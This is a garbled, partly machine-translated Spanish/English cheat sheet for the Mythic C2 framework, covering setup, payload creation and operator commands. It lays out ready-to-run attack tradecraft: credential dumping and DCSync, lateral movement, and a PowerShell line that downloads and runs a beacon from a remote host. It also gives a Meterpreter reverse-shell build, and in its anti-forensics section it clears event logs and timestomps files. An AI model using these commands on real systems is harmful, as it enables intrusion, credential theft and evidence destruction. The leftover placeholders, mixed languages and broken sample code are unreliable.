Mythic
__FRONTMATTER_49_# Mythic C2 Framework Cheat Sheet
__HTML_TAG_39_ Todos los comandos
Overview¶
Mythic es un moderno marco de mando y control multiplataforma (C2) diseñado para operaciones de equipo rojo y emulación de adversarios. Construido con una arquitectura containerizzate usando Docker, Mythic proporciona una interfaz web colaborativa, soporta múltiples tipos de carga, y ofrece una amplia personalización a través de su arquitectura basada en agentes con soporte para múltiples lenguajes de programación.
▪ restablecimiento Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar contra cualquier objetivo.
Instalación¶
Prerequisites¶
# Install Docker and Docker Compose
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo usermod -aG docker $USER
# Install Docker Compose
sudo curl -L "https://github.com/docker/compose/releases/download/v2.20.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
# Verify installation
docker --version
docker-compose --version
Mythic installation¶
# Clone Mythic repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Make install script executable
chmod +x mythic-cli
# Install Mythic
sudo ./mythic-cli install
# Start Mythic services
sudo ./mythic-cli start
# Check status
sudo ./mythic-cli status
Quick Setup¶
# One-liner installation
curl -sSL https://raw.githubusercontent.com/its-a-feature/Mythic/master/install.sh|bash
# Access web interface
# Navigate to https://localhost:7443
# Default credentials will be displayed during installation
Manual Docker Setup¶
# Clone repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Build containers
docker-compose build
# Start services
docker-compose up -d
# View logs
docker-compose logs -f mythic_server
Configuración básica¶
¶
# First-time configuration
1. Navigate to https://localhost:7443
2. Login with generated credentials
3. Complete initial setup wizard
4. Configure global settings
# Change default passwords
sudo ./mythic-cli config set MYTHIC_ADMIN_PASSWORD newpassword
sudo ./mythic-cli config set MYTHIC_SERVER_BIND_LOCALHOST_ONLY false
# Restart services
sudo ./mythic-cli restart
Configuración SSL
# Generate SSL certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /path/to/cert.pem
sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /path/to/key.pem
# Use Let's Encrypt
certbot certonly --standalone -d your-domain.com
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /etc/letsencrypt/live/your-domain.com/fullchain.pem
sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /etc/letsencrypt/live/your-domain.com/privkey.pem
# Restart with new certificates
sudo ./mythic-cli restart
Agent installation¶
# Install popular agents
sudo ./mythic-cli install github https://github.com/MythicAgents/apfell.git
sudo ./mythic-cli install github https://github.com/MythicAgents/poseidon.git
sudo ./mythic-cli install github https://github.com/MythicAgents/apollo.git
sudo ./mythic-cli install github https://github.com/MythicAgents/merlin.git
# List available agents
sudo ./mythic-cli list
# Start specific agent
sudo ./mythic-cli start apfell
Web Interface Navigation¶
Dashboard Overview¶
| Section | Description |
|---|---|
| Operations | Manage operations and campaigns |
| Payloads | Create and manage payload configurations |
| Callbacks | Active agent connections |
| Tasks | Command execution and task management |
| Files | File management and downloads |
| Credentials | Harvested credentials database |
| Artifacts | IOCs and forensic artifacts |
| Reporting | Generate operation reports |
Operations Management¶
# Create new operation
1. Navigate to Operations → Create
2. Configure operation parameters:
- Name: Red Team Exercise 2024
- Description: Authorized penetration test
- Admin: [Your username]
- Complete: false
# Operation settings
- Webhook URL: [Slack/Teams integration]
- OPSEC: Enable/disable certain commands
- Logging: Configure audit logging
Payload Creation¶
Apfell (macOS/Linux) Payload¶
# Create Apfell payload
1. Navigate to Payloads → Create
2. Select Apfell agent
3. Configure parameters:
- Payload Type: apfell
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 80
- Callback Interval: 10
- Jitter: 23
# Build options
- Output Format: bash, zsh, osascript, dylib
- Architecture: x64, arm64
- Obfuscation: Enable string obfuscation
Poseidon (Cross-platform) Carga¶
# Create Poseidon payload
1. Navigate to Payloads → Create
2. Select Poseidon agent
3. Configure parameters:
- Payload Type: poseidon
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 443
- User Agent: Mozilla/5.0...
- Sleep: 5
- Jitter: 10
# Advanced options
- Proxy: Configure proxy settings
- Headers: Custom HTTP headers
- Encryption: AES encryption key
Apollo (Windows) Payload¶
# Create Apollo payload
1. Navigate to Payloads → Create
2. Select Apollo agent
3. Configure parameters:
- Payload Type: apollo
- C2 Profile: HTTP
- Architecture: x64, x86
- Format: exe, dll, shellcode
- Callback Host: [Your IP/Domain]
- Callback Port: 8080
# Windows-specific options
- PPID Spoofing: Enable parent process spoofing
- Block DLLs: Block non-Microsoft DLLs
- ETW Bypass: Enable ETW evasion
C2 Profiles¶
Configuración del perfil HTTP
\\\\{
"name": "HTTP Profile",
"description": "Standard HTTP communication",
"parameters": \\\\{
"callback_host": "192.168.1.100",
"callback_port": 80,
"killdate": "2024-12-31",
"encrypted_exchange_check": true,
"callback_jitter": 23,
"callback_interval": 10,
"get_uri": "/api/v1/status",
"post_uri": "/api/v1/data",
"query_path_name": "q",
"proxy_host": "",
"proxy_port": "",
"proxy_user": "",
"proxy_pass": ""
\\\\}
\\\\}
Configuración de perfil HTTPS
\\\\{
"name": "HTTPS Profile",
"description": "Encrypted HTTPS communication",
"parameters": \\\\{
"callback_host": "secure.example.com",
"callback_port": 443,
"callback_interval": 30,
"callback_jitter": 15,
"encrypted_exchange_check": true,
"ssl_cert_path": "/path/to/cert.pem",
"ssl_key_path": "/path/to/key.pem",
"headers": [
\\\\{
"name": "User-Agent",
"value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
\\\\}
]
\\\\}
\\\\}
WebSocket Profile¶
\\\\{
"name": "WebSocket Profile",
"description": "WebSocket-based communication",
"parameters": \\\\{
"callback_host": "ws.example.com",
"callback_port": 8080,
"endpoint": "/ws",
"user_agent": "Mozilla/5.0...",
"heartbeat_interval": 30
\\\\}
\\\\}
Agent Management¶
Callback Interaction¶
# Basic callback commands
help # Show available commands
whoami # Get current user
pwd # Current directory
ls # List directory contents
cd [path] # Change directory
cat [file] # Read file
download [file] # Download file
upload [local] [remote] # Upload file
shell [command] # Execute shell command
Process Management¶
# Process operations
ps # List processes
kill [pid] # Kill process
jobs # List background jobs
jobkill [jid] # Kill background job
# Process injection (Apollo)
inject [pid] [shellcode] # Inject shellcode
shinject [pid] [file] # Inject shellcode from file
dllload [dll] # Load DLL
Credential Operations¶
# Credential harvesting
mimikatz [command] # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [user] # DCSync attack
# Token manipulation
steal_token [pid] # Steal process token
make_token [user] [pass] # Create token
rev2self # Revert to self
Lateral Movement¶
# Remote execution
psexec [target] [command] # PSExec execution
wmiexec [target] [command] # WMI execution
smbexec [target] [command] # SMB execution
# PowerShell remoting
invoke_command [target] [command] # PowerShell remoting
enter_pssession [target] # Interactive PS session
# SSH (Poseidon)
ssh [target] [user] [key] # SSH connection
scp [source] [dest] # Secure copy
Características avanzadas¶
SOCKS Proxy¶
# Start SOCKS proxy
socks [port] # Start SOCKS4/5 proxy
socks_list # List active proxies
socks_kill [id] # Kill SOCKS proxy
# Use with external tools
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24
Port Forwarding¶
# Local port forwarding
portfwd [local_port] [remote_host] [remote_port]
# Reverse port forwarding
rportfwd [remote_port] [local_host] [local_port]
# List active forwards
portfwd_list
# Kill port forward
portfwd_kill [id]
File Operations¶
# File management
mkdir [directory] # Create directory
rm [file] # Remove file
mv [source] [dest] # Move file
cp [source] [dest] # Copy file
chmod [mode] [file] # Change permissions
# Archive operations
zip [archive] [files] # Create zip archive
unzip [archive] # Extract archive
tar [options] [archive] # Tar operations
Network Discovery¶
# Network reconnaissance
portscan [target] [ports] # Port scanning
ping [target] # ICMP ping
traceroute [target] # Trace route
arp # ARP table
netstat # Network connections
ifconfig # Network interfaces
Automatización y scripting¶
Task Automation¶
# Python automation script
import asyncio
import mythic
async def automated_recon(callback_id):
"""Automated reconnaissance on new callback"""
# Basic system information
tasks = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an"
]
for task in tasks:
await mythic.issue_task(callback_id, task)
await asyncio.sleep(2)
# Credential harvesting if elevated
if await mythic.is_elevated(callback_id):
await mythic.issue_task(callback_id, "mimikatz logonpasswords")
await mythic.issue_task(callback_id, "lsadump")
# Register automation
mythic.register_callback_automation(automated_recon)
Webhook Integration¶
# Slack webhook integration
import requests
import json
def send_slack_notification(callback_info):
"""Send Slack notification for new callbacks"""
webhook_url = "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
message = \\\\{
"text": f"New Mythic Callback",
"attachments": [
\\\\{
"color": "good",
"fields": [
\\\\{"title": "Host", "value": callback_info['host'], "short": True\\\\},
\\\\{"title": "User", "value": callback_info['user'], "short": True\\\\},
\\\\{"title": "Agent", "value": callback_info['agent'], "short": True\\\\},
\\\\{"title": "IP", "value": callback_info['ip'], "short": True\\\\}
]
\\\\}
]
\\\\}
requests.post(webhook_url, data=json.dumps(message),
headers=\\\\{'Content-Type': 'application/json'\\\\})
# Configure webhook in Mythic
mythic.set_webhook_callback(send_slack_notification)
Batch Operations¶
#!/bin/bash
# Batch callback management script
MYTHIC_URL="https://localhost:7443"
API_TOKEN="your_api_token"
# Function to execute command on all callbacks
execute_on_all() \\\\{
local command=$1
# Get all active callbacks
callbacks=$(curl -s -k -H "Authorization: Bearer $API_TOKEN" \
"$MYTHIC_URL/api/v1.4/callbacks"|jq -r '.callbacks[].id')
for callback_id in $callbacks; do
echo "[+] Executing '$command' on callback $callback_id"
curl -s -k -X POST \
-H "Authorization: Bearer $API_TOKEN" \
-H "Content-Type: application/json" \
-d "\\\\{\"command\": \"$command\"\\\\}" \
"$MYTHIC_URL/api/v1.4/callbacks/$callback_id/tasks"
sleep 1
done
\\\\}
# Usage examples
execute_on_all "whoami"
execute_on_all "ps"
execute_on_all "netstat -an"
Custom Agents¶
Agent Development Structure¶
# Custom agent template
from mythic_payloadtype_container.MythicCommandBase import *
from mythic_payloadtype_container.MythicRPC import *
class CustomAgent(PayloadType):
name = "custom_agent"
file_extension = "py"
author = "@your_handle"
supported_os = [SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS]
wrapper = False
wrapped_payloads = []
note = "Custom Python-based agent"
supports_dynamic_loading = True
async def build(self) -> BuildResponse:
# Build logic here
resp = BuildResponse(status=BuildStatus.Success)
return resp
# Command implementation
class WhoAmI(CommandBase):
cmd = "whoami"
needs_admin = False
help_cmd = "Get current user information"
description = "Execute whoami command"
version = 1
author = "@your_handle"
async def create_tasking(self, task: MythicTask) -> MythicTask:
task.display_params = "whoami"
return task
async def process_response(self, response: AgentResponse):
pass
Agent Communication¶
// Go agent communication example
package main
import (
"bytes"
"crypto/tls"
"encoding/json"
"net/http"
"time"
)
type Agent struct \\\\{
ID string
Host string
Port int
Interval time.Duration
Jitter int
\\\\}
func (a *Agent) Checkin() error \\\\{
checkinData := map[string]interface\\\\{\\\\}\\\\{
"action": "checkin",
"uuid": a.ID,
"ips": getLocalIPs(),
"os": getOSInfo(),
"user": getCurrentUser(),
"host": getHostname(),
"pid": getPID(),
"ppid": getPPID(),
\\\\}
jsonData, _ := json.Marshal(checkinData)
tr := &http.Transport\\\\{
TLSClientConfig: &tls.Config\\\\{InsecureSkipVerify: true\\\\},
\\\\}
client := &http.Client\\\\{Transport: tr\\\\}
resp, err := client.Post(
fmt.Sprintf("https://%s:%d/api/v1.4/agent_message", a.Host, a.Port),
"application/json",
bytes.NewBuffer(jsonData),
)
if err != nil \\\\{
return err
\\\\}
defer resp.Body.Close()
return nil
\\\\}
func (a *Agent) GetTasks() ([]Task, error) \\\\{
// Implementation for getting tasks
return nil, nil
\\\\}
func (a *Agent) SendResponse(taskID string, response string) error \\\\{
// Implementation for sending task responses
return nil
\\\\}
Integración con otras herramientas¶
Metasploit Integration¶
# Use Mythic with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Mythic callback
upload meterpreter.exe /tmp/meterpreter.exe
# Execute Metasploit payload
shell /tmp/meterpreter.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
BloodHound Integration¶
# Collect BloodHound data via Mythic
# Upload SharpHound
upload SharpHound.exe /tmp/sharphound.exe
# Run collection
shell /tmp/sharphound.exe -c All -d domain.local --zipfilename bloodhound.zip
# Download results
download /tmp/bloodhound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
Cobalt Strike Integration¶
# Beacon integration
# Generate Cobalt Strike beacon
# Use Mythic for initial access, pivot to Beacon
# From Mythic callback
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Operational Security¶
Communication Security¶
# Domain fronting configuration
# Configure CDN (CloudFlare, AWS CloudFront)
# Set up domain fronting rules
# Update C2 profile with fronted domain
# Certificate management
# Use legitimate SSL certificates
# Implement certificate pinning
# Rotate certificates regularly
Traffic Analysis Evasion¶
# Malleable profiles
# Mimic legitimate applications
# Use common user agents
# Implement realistic timing
# Example profile mimicking Office 365
\\\\{
"name": "Office365",
"user_agent": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro)",
"get_uri": "/owa/auth/logon.aspx",
"post_uri": "/owa/auth/owaauth.dll",
"headers": [
\\\\{"name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"\\\\},
\\\\{"name": "Accept-Language", "value": "en-US,en;q=0.5"\\\\},
\\\\{"name": "Accept-Encoding", "value": "gzip, deflate"\\\\}
]
\\\\}
Anti-Forensics¶
# Event log clearing
shell wevtutil cl System
shell wevtutil cl Security
shell wevtutil cl Application
# Timestomping
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
# Memory cleanup
# Implement secure memory wiping
# Use process migration
# Clear command history
Troubleshooting¶
Common Issues¶
# Callback not connecting
1. Check firewall rules
2. Verify C2 profile configuration
3. Test network connectivity
4. Check DNS resolution
# SSL/TLS issues
# Regenerate certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /new/path/cert.pem
sudo ./mythic-cli restart
# Container issues
# Check Docker status
docker ps -a
docker logs mythic_server
# Restart services
sudo ./mythic-cli restart
Debug Mode¶
# Enable debug logging
sudo ./mythic-cli config set MYTHIC_DEBUG_LEVEL DEBUG
sudo ./mythic-cli restart
# View logs
sudo ./mythic-cli logs
# Database issues
# Access PostgreSQL
docker exec -it mythic_postgres psql -U mythic_user -d mythic_db
# Reset database
sudo ./mythic-cli database reset
Performance Optimization¶
# Optimize Docker resources
# Increase memory allocation
sudo ./mythic-cli config set MYTHIC_DOCKER_MEMORY 4g
# Optimize callback intervals
# Increase sleep time for stealth
# Reduce jitter for faster response
# Database optimization
# Regular database maintenance
# Index optimization
# Query performance tuning
Buenas prácticas¶
Operational Planning¶
- Pre-engagement setup: Configurar perfiles y agentes antes del compromiso
- Coordinación del equipo: Gestión de operaciones para la colaboración en equipo
- Protolos de comunicación: Establecer canales de comunicación C2 claros
- Manejo de datos: Implementar la recopilación y la exfiltración de datos seguros
- ** Procedimientos de cierre**: Plan de eliminación de artefactos y limpieza operacional
Consideraciones de seguridad¶
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent configurations
# Implement kill dates
# Regular agent rotation
# Secure communication channels
Documentación y presentación de informes¶
# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Resources¶
- [Repositorio de GitHub Mythic](URL_44_
- [Documentación Mística](URL_45__
- [Repositorio de Agentes Mitológicos](URL_46__
- [ Mythic C2 Profiles](URL_47__
- [Entrenamiento Mitético del Grupo Rojo](URL_48__
-...
*Esta hoja de trampa proporciona una referencia completa para usar el marco Mythic C2. Siempre asegúrese de tener una autorización adecuada antes de realizar operaciones de equipo rojo o pruebas de penetración. *